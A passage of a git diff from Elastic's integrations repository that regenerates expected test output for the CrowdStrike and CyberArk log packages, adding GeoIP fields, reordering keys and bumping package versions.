"ffffffffe5ff467b4f0c4fd41a4462bb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe5ff467b4f0c4fd41a4462bb", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:05:27.011Z", "ecs": { 
@@ -9032,7 +10181,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151301600Z", + "ingested": "2021-12-14T14:41:26.533797361Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321210562584146513\",\"ContextTimeStamp\":\"1604855127.011\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"53\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffe5ff467b4f0c4fd41a4462bb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-ae74-065212970c5d\",\"name\":\"NetworkListenIP4MacV5\",\"timestamp\":\"1604855128936\"}", "created": "2020-11-08T17:05:28.936Z", "kind": "event", @@ -9071,12 +10220,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff59514ea68b4693ddfb9b6643", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff59514ea68b4693ddfb9b6643", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:25.108Z", "ecs": { 
@@ -9097,7 +10255,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151308Z", + "ingested": "2021-12-14T14:41:26.533797753Z", "original": "{\"AuthenticationId\":\"999\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855185.108\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\gpsvc.dll\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"219053851298\",\"RpcClientThreadId\":\"22047924482692\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"gpsvc\",\"TargetProcessId\":\"224116976578\",\"TargetThreadId\":\"22920092479704\",\"TokenType\":\"1\",\"UserName\":\"user7\",\"aid\":\"ffffffff59514ea68b4693ddfb9b6643\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStarted\",\"id\":\"ffffffff-1111-11eb-860c-0606af112d55\",\"name\":\"HostedServiceStartedV2\",\"timestamp\":\"1604855184068\"}", "created": "2020-11-08T17:06:24.068Z", "kind": "event", 
@@ -9132,28 +10290,31 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff2b5a4bf5afc6682595faa016", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "661455186053", "title": "wuauserv" }, + "@timestamp": "2020-11-08T17:08:19.018Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff2b5a4bf5afc6682595faa016", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T17:08:19.018Z", "ecs": { "version": "1.12.0" }, @@ -9169,7 +10330,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151314400Z", + "ingested": "2021-12-14T14:41:26.533798147Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855299.018\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ServiceDisplayName\":\"wuauserv\",\"TargetProcessId\":\"661455186053\",\"TargetThreadId\":\"24238019995551\",\"aid\":\"ffffffff2b5a4bf5afc6682595faa016\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStopped\",\"id\":\"ffffffff-1111-11eb-9b11-0602a5689467\",\"name\":\"HostedServiceStoppedV1\",\"timestamp\":\"1604855302512\"}", "created": "2020-11-08T17:08:22.512Z", "kind": "event", @@ -9190,7 +10351,13 @@ "EffectiveTransmissionClass": "3", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -9209,12 +10376,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff32cb4abc50bc133b31a69946", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff32cb4abc50bc133b31a69946", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:07:07.625Z", "file": { 
@@ -9242,7 +10418,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151320700Z", + "ingested": "2021-12-14T14:41:26.533798616Z", "original": "{\"AuthenticationId\":\"3443175\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1091372257857\",\"ContextThreadId\":\"36855848099771\",\"ContextTimeStamp\":\"1604855227.625\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1179\\u0026DEV_0113\\u0026SUBSYS_00011179\\u0026REV_01\\\\4\\u00263ad42678\\u00260\\u002600E0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100\",\"FileObject\":\"18446603341701082336\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"288041\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user12\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\\\TempState\\\\Downloads\\\\ex.pdf.8e41hf8.partial\",\"TokenType\":\"1\",\"aid\":\"ffffffff32cb4abc50bc133b31a69946\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PdfFileWritten\",\"id\":\"ffffffff-1111-11eb-baea-02dccfbb7779\",\"name\":\"PdfFileWrittenV11\",\"timestamp\":\"1604855264313\"}", "created": "2020-11-08T17:07:44.313Z", "kind": "event", 
@@ -9305,12 +10481,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff655344736aca58d17fb570f0", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0012309.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff655344736aca58d17fb570f0", + "type": "agent", + "version": "1007.3.0012309.1" }, "@timestamp": "2020-11-08T17:06:22.022Z", "ecs": { 
@@ -9330,7 +10515,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151327Z", + "ingested": "2021-12-14T14:41:26.533799035Z", "original": "{\"AuthenticationId\":\"3783389\",\"CommandLine\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\\\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca\",\"ConfigBuild\":\"1007.3.0012309.1\",\"ConfigStateHash\":\"3998263252\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\backgroundTaskHost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"4096\",\"MD5HashData\":\"50d5fd1290d94d46acca0585311e74d5\",\"ParentAuthenticationId\":\"3783389\",\"ParentBaseFileName\":\"svchost.exe\",\"ParentProcessId\":\"2439558094566\",\"ProcessCreateFlags\":\"525332\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"16385\",\"ProcessStartTime\":\"1604855181.648\",\"ProcessSxsFlags\":\"1600\",\"RawProcessId\":\"22272\",\"RpcClientProcessId\":\"2439558094566\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37\",\"SessionId\":\"1\",\"SourceProcessId\":\"2439558094566\",\"SourceThreadId\":\"77538684027214\",\"Tags\":\"41, 12094627905582, 12094627906234\",\"TargetProcessId\":\"2450046082233\",\"TokenType\":\"2\",\"UserSid\":\"S-1-12-1-3697283754-1083485977-2164330645-2516515886\",\"WindowFlags\":\"128\",\"aid\":\"ffffffff655344736aca58d17fb570f0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-8462-02ade3b2f949\",\"name\":\"ProcessRollup2V18\",\"timestamp\":\"1604855182022\"}", "created": "2020-11-08T17:06:22.022Z", "kind": "event", 
@@ -9374,24 +10559,27 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:09:15.388Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -9410,7 +10598,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151333400Z", + "ingested": "2021-12-14T14:41:26.533799422Z", "original": "{\"AuthenticationId\":\"326190744\",\"AuthenticationUuid\":\"98467113-C771-4845-B71B-89B3CE9F93C9\",\"AuthenticationUuidAsString\":\"13714698-71C7-4548-B71B-89B3CE9F93C9\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"Entitlements\":\"15\",\"UID\":\"326190744\",\"UserPrincipal\":\"user8@dom6\",\"UserSid\":\"S-1-5-21-3629339319-2376021926-2724479216-652382488\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"UserIdentityMacV2\",\"timestamp\":\"1604855355388\"}", "created": "2020-11-08T17:09:15.388Z", "kind": "event", 
@@ -9441,16 +10629,31 @@ "id": "326190744", "email": "user8@dom6", "domain": "dom6" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffffcdb543135e7fcdf8e5a8fbdb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffcdb543135e7fcdf8e5a8fbdb", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:57.555Z", "os": { @@ -9471,7 +10674,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151339800Z", + "ingested": "2021-12-14T14:41:26.533799813Z", "original": "{\"BootArgs\":\" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1874387338\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"MachineDomain\":\"\",\"aid\":\"ffffffffcdb543135e7fcdf8e5a8fbdb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostInfo\",\"id\":\"ffffffff-1111-11eb-9bbd-061290dcd983\",\"name\":\"HostInfoV2\",\"timestamp\":\"1604855157555\"}", "created": "2020-11-08T17:05:57.555Z", "kind": "event", 
@@ -9522,12 +10725,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T15:57:10.593Z", "file": { @@ -9559,7 +10771,7 @@ }, "event": { "action": "GenericFileWritten", - "ingested": "2021-12-09T13:36:11.151346200Z", + "ingested": "2021-12-14T14:41:26.533800212Z", "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}", "id": "ffffffff-1111-11eb-800a-06cecfd73923", "created": "2020-11-08T15:57:11.298Z" 
@@ -9586,30 +10798,33 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff896b43725b83c79aa79959da", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "1717987648455", "thread": { "id": 55064470042288 } }, + "@timestamp": "2020-11-08T15:54:59.164Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff896b43725b83c79aa79959da", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T15:54:59.164Z", "ecs": { "version": "1.12.0" }, @@ -9625,7 +10840,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151387500Z", + "ingested": "2021-12-14T14:41:26.533800598Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"666346415\",\"ContextProcessId\":\"1717987648455\",\"ContextThreadId\":\"55064470042288\",\"ContextTimeStamp\":\"1604850899.164\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume27\",\"aid\":\"ffffffff896b43725b83c79aa79959da\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeUnmounted\",\"id\":\"ffffffff-1111-11eb-9f70-0634389d9ea9\",\"name\":\"FsVolumeUnmountedV2\",\"timestamp\":\"1604850899812\"}", "created": "2020-11-08T15:54:59.812Z", "kind": "event", 
@@ -9646,30 +10861,39 @@ "EffectiveTransmissionClass": "3", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } - }, - { - "process": { - "entity_id": "66426035996442255" - }, - "os": { - "type": "macos" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff899541b94b9adff8922aa70a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0009906.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff899541b94b9adff8922aa70a", + "type": "agent", + "version": "1007.4.0009906.1" + }, + "process": { + "entity_id": "66426035996442255" }, "@timestamp": "2020-11-08T15:58:18.548Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -9685,7 +10909,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151393400Z", + "ingested": "2021-12-14T14:41:26.533800980Z", "original": "{\"ConfigBuild\":\"1007.4.0009906.1\",\"ConfigStateHash\":\"3429017943\",\"ContextProcessId\":\"66426035996442255\",\"ContextTimeStamp\":\"1604851098.548\",\"Entitlements\":\"15\",\"aid\":\"ffffffff899541b94b9adff8922aa70a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"FirewallDisabled\",\"id\":\"ffffffff-1111-11eb-9d4c-02f402df8c1f\",\"name\":\"FirewallDisabledMacV1\",\"timestamp\":\"1604851040625\"}", "created": "2020-11-08T15:57:20.625Z", "kind": "event", 
@@ -9705,20 +10929,31 @@ "ConfigStateHash": "3429017943", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "fffffffffffaaaaaaaaabbbbbbbb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.31.14404.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "os": { - "type": "macos", - "version": "Big Sur (11.0)" + "ip": "67.43.156.14", + "serial_number": "fffffffffffaaaaaaaaabbbbbbbb", + "type": "agent", + "version": "6.31.14404.0" }, "ecs": { "version": "1.12.0" @@ -9732,6 +10967,10 @@ "67.43.156.14" ] }, + "os": { + "type": "macos", + "version": "Big Sur (11.0)" + }, "host": { "geo": { "continent_name": "North America", 
@@ -9743,7 +10982,7 @@ "hostname": "mac1" }, "event": { - "ingested": "2021-12-09T13:36:11.151397900Z", + "ingested": "2021-12-14T14:41:26.533801375Z", "original": "{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"1636436839.9529998\",\"AgentTimeOffset\":\"125.319\",\"AgentVersion\":\"6.31.14404.0\",\"BiosManufacturer\":\"Apple Inc.\",\"BiosVersion\":\"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)\",\"ChassisType\":\"Laptop\",\"City\":\"San Francisco\",\"ComputerName\":\"mac1\",\"ConfigBuild\":\"1007.4.0014404.1\",\"ConfigIDBuild\":\"14404\",\"Continent\":\"North America\",\"Country\":\"United States\",\"FalconGroupingTags\":\"-\",\"FirstSeen\":\"1625682391.0\",\"HostHiddenStatus\":\"Visible\",\"MachineDomain\":\"none\",\"OU\":\"none\",\"PointerSize\":\"none\",\"ProductType\":\"1\",\"SensorGroupingTags\":\"-\",\"ServicePackMajor\":\"none\",\"SiteName\":\"none\",\"SystemManufacturer\":\"Apple Inc.\",\"SystemProductName\":\"MacBookPro16,2\",\"Time\":\"1636448427.3539999\",\"Timezone\":\"America/Los_Angeles\",\"Version\":\"Big Sur (11.0)\",\"aid\":\"fffffffffffaaaaaaaaabbbbbbbb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022ff\",\"event_platform\":\"Mac\"}" }, "crowdstrike": { diff --git a/packages/crowdstrike/manifest.yml b/packages/crowdstrike/manifest.yml index 7ad725c64c4..7d7123692cf 100644 --- a/packages/crowdstrike/manifest.yml +++ b/packages/crowdstrike/manifest.yml @@ -1,6 +1,6 @@ name: crowdstrike title: CrowdStrike Logs -version: 1.1.1 +version: 1.1.2 description: Collect and parse falcon logs from Crowdstrike products with Elastic Agent. type: integration format_version: 1.0.0 diff --git a/packages/cyberark/changelog.yml b/packages/cyberark/changelog.yml index 4df9823faf1..32fd926e7ec 100644 --- a/packages/cyberark/changelog.yml +++ b/packages/cyberark/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.4.5" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.4.4" changes: - description: Uniform with guidelines diff --git a/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json b/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json index 789d5b35c95..5f0302c05d9 100644 --- a/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cyberark/data_stream/corepas/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "2016-01-29 06:09:59.732538723 +0000 UTC eacommod1428.lan %CYBERARK: MessageID=\"188\";exercita 1.1332\",ProductAccount=\"itv\",ProductProcess=\"odoco\",EventId=\"ria\",EventClass=\"min\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"utl\",ActingAddress=\"10.208.15.216\",ActionSourceUser=\"tation\",ActionTargetUser=\"quasiarc\",ActionObject=\"liqua\",ActionSafe=\"ciade\",ActionLocation=\"turadipi\",ActionCategory=\"aeca\",ActionRequestId=\"idi\",ActionReason=\"pexe\",ActionExtraDetails=\"nes\"", "event": { - "ingested": "2021-06-09T10:19:22.409979200Z" + "ingested": "2021-12-14T14:41:55.823507474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"168\";Version=1.259;Message=block;Issuer=dolore;Station=10.92.136.230;File=ritquiin;Safe=umqui;Location=reeufugi;Category=mdolo;RequestId=mqui;Reason=nci;Severity=very-high;SourceUser=litesse;TargetUser=orev;GatewayStation=10.175.75.18;TicketID=deF;PolicyID=sist;UserName=nnumqu;LogonDomain=iatnu3810.mail.localdomain;Address=volup208.invalid;CPMStatus=eosquir;Port=5191;Database=umdo;DeviceType=itessequ;ExtraDetails=vol;", "event": { - "ingested": "2021-06-09T10:19:22.410003600Z" + "ingested": "2021-12-14T14:41:55.823539368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nibus 2016-02-26 20:15:08.252538723 +0000 UTC mipsumq3879.internal.localdomain %CYBERARK: 
MessageID=\"26\";Version=1.7269;Message=accept;Issuer=incid;Station=10.51.132.10;File=utper;Safe=squame;Location=ntex;Category=eius;RequestId=luptat;Reason=emape;Severity=low;SourceUser=incidi;TargetUser=nse;GatewayStation=10.46.185.46;TicketID=temvel;PolicyID=iatu;UserName=serror;LogonDomain=anti4454.api.example;Address=tetu5280.www5.invalid;CPMStatus=tionulam;Port=2548;Database=byC;DeviceType=tinculp;ExtraDetails=tur;", "event": { - "ingested": "2021-06-09T10:19:22.410011Z" + "ingested": "2021-12-14T14:41:55.823540017Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-03-12 03:17:42.512538723 +0000 UTC minim7868.www5.localdomain %CYBERARK: MessageID=\"184\";Version=1.6713;Message=deny;Issuer=psumquia;Station=10.53.192.140;File=con;Safe=uia;Location=quiavo;Category=issusci;RequestId=mol;Reason=taspe;Severity=high;SourceUser=psumq;TargetUser=atcup;GatewayStation=10.155.236.240;TicketID=tatno;PolicyID=dquiac;UserName=ptass;LogonDomain=uam6303.api.lan;Address=llu4762.mail.localdomain;CPMStatus=scivel;Port=5695;Database=aperi;DeviceType=iveli;ExtraDetails=llumd;", "event": { - "ingested": "2021-06-09T10:19:22.410019200Z" + "ingested": "2021-12-14T14:41:55.823540445Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"161\";emaper 1.2638\",ProductAccount=\"eos\",ProductProcess=\"enimad\",EventId=\"rmagni\",EventClass=\"sit\",EventSeverity=\"medium\",EventMessage=\"cancel\",ActingUserName=\"oremips\",ActingAddress=\"10.81.199.122\",ActionSourceUser=\"aquaeabi\",ActionTargetUser=\"giatq\",ActionObject=\"quid\",ActionSafe=\"fug\",ActionLocation=\"uatDuis\",ActionCategory=\"ude\",ActionRequestId=\"maveniam\",ActionReason=\"uian\",ActionExtraDetails=\"tempo\"", "event": { - "ingested": "2021-06-09T10:19:22.410025600Z" + "ingested": "2021-12-14T14:41:55.823540856Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eetd 2016-04-09 17:22:51.032538723 +0000 UTC eip1448.internal.local %CYBERARK: MessageID=\"139\";Version=1.3491;Message=deny;Issuer=tcupida;Station=10.139.186.201;File=ect;Safe=reetdolo;Location=nrepreh;Category=obeataev;RequestId=lor;Reason=uidexea;Severity=medium;SourceUser=natura;TargetUser=aboris;GatewayStation=10.172.14.142;TicketID=ssitaspe;PolicyID=gitsedqu;UserName=uam;LogonDomain=temq1198.internal.example;Address=aquaeab2275.www5.domain;CPMStatus=ehend;Port=4091;Database=isiu;DeviceType=nimadmi;ExtraDetails=iatisu;", "event": { - "ingested": "2021-06-09T10:19:22.410031600Z" + "ingested": "2021-12-14T14:41:55.823541285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"106\";Version=1.6875;Message=accept;Issuer=ipis;Station=10.47.76.251;File=eataevit;Safe=uptatev;Location=uovol;Category=dmi;RequestId=olab;Reason=mquisnos;Severity=medium;SourceUser=ore;TargetUser=etconsec;GatewayStation=10.104.111.129;TicketID=mUt;PolicyID=usmodte;UserName=ele;LogonDomain=tenbyCic5882.api.home;Address=amquisno3338.www5.lan;CPMStatus=nonnu;Port=776;Database=riat;DeviceType=luptatem;ExtraDetails=umdolor;", "event": { - "ingested": "2021-06-09T10:19:22.410038300Z" + "ingested": "2021-12-14T14:41:55.823541703Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inB 2016-05-08 07:27:59.552538723 +0000 UTC deomni124.www.example %CYBERARK: MessageID=\"74\";tae 
